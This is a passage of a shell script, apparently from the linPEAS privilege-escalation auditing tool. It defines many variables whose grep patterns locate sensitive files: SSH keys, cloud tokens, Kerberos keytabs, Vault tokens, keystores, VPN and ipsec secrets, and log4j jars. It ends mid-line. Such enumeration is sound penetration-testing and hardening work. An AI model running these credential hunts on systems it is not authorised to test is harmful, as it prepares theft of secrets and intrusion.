PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_RACOON=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70) + PSTORAGE_KUBELET=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/var" | grep -E "kubelet$|kube-proxy$" | sort | uniq | head -n 70) + PSTORAGE_VNC=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32\n$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) + PSTORAGE_LDAP=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "ldap$" | sort | uniq | head -n 70) + PSTORAGE_LOG4SHELL=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/lib|^/snap|^/opt|^/sbin|^/tmp|^/lib32|^/media|^/usr|^/lib64|^$GREPHOMESEARCH|^/.cache|^/cdrom|^/applications|^/mnt|^/var|^/private|^/etc|^/bin|^/srv" | grep -E "log4j-core.*\.jar$" | sort | uniq | head -n 70) + PSTORAGE_OPENVPN=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) + PSTORAGE_SSH=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) + PSTORAGE_CERTSB4=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) + PSTORAGE_CERTSBIN=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) + PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) + PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private" | grep -E "agent.*$" | sort | uniq | head -n 70) + PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^$GREPHOMESEARCH|^/usr" | grep -E "ssh.*config$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32\n$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) + PSTORAGE_KERBEROS=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_KIBANA=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_KNOCKD=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) + PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "logstash$" | sort | uniq | head -n 70) + PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "\.vault-token$" | sort | uniq | head -n 70) + PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "couchdb$" | sort | uniq | head -n 70) + PSTORAGE_REDIS=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "redis\.conf$" | sort | uniq | head -n 70) + PSTORAGE_MOSQUITTO=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) + PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "neo4j$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_ERLANG=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) + PSTORAGE_GMV_AUTH=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IPSEC=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "\.irssi$" | sort | uniq | head -n 70) + PSTORAGE_KEYRING=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32\n$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) + PSTORAGE_FILEZILLA=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32\n$FIND_DIR_MNT\n$FIND_DIR_CACHE\n$FIND_DIR_OPT\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_MEDIA\n$FIND_DIR_BIN\n$FIND_DIR_HOMESEARCH" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) + PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) + PSTORAGE_SPLUNK=$(echo -e "$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_ETC\n$FIND_MEDIA\n$FIND_SYSTEM\n$FIND_VAR\n$FIND_TMP\n$FIND_USR\n$FIND_BIN\n$FIND_PRIVATE\n$FIND_LIB64\n$FIND_RUN\n$FIND_OPT\n$FIND_SNAP\n$FIND_CACHE\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_SRV\n$FIND_LIB\n$FIND_SYS\n$FIND_MNT\n$FIND_APPLICATIONS\n$FIND_LIB32" | grep -E "^/tmp|^/private|^/etc|^/media|^/applications|^/snap|^/bin|^/usr|^/mnt|^/var|^/opt|^/sbin|^/cdrom|^/srv|^$GREPHOMESEARCH|^/.cache" | grep -E "passwd$" | sort | uniq | head -n 70) + PSTORAGE_GITLAB=$(echo -e 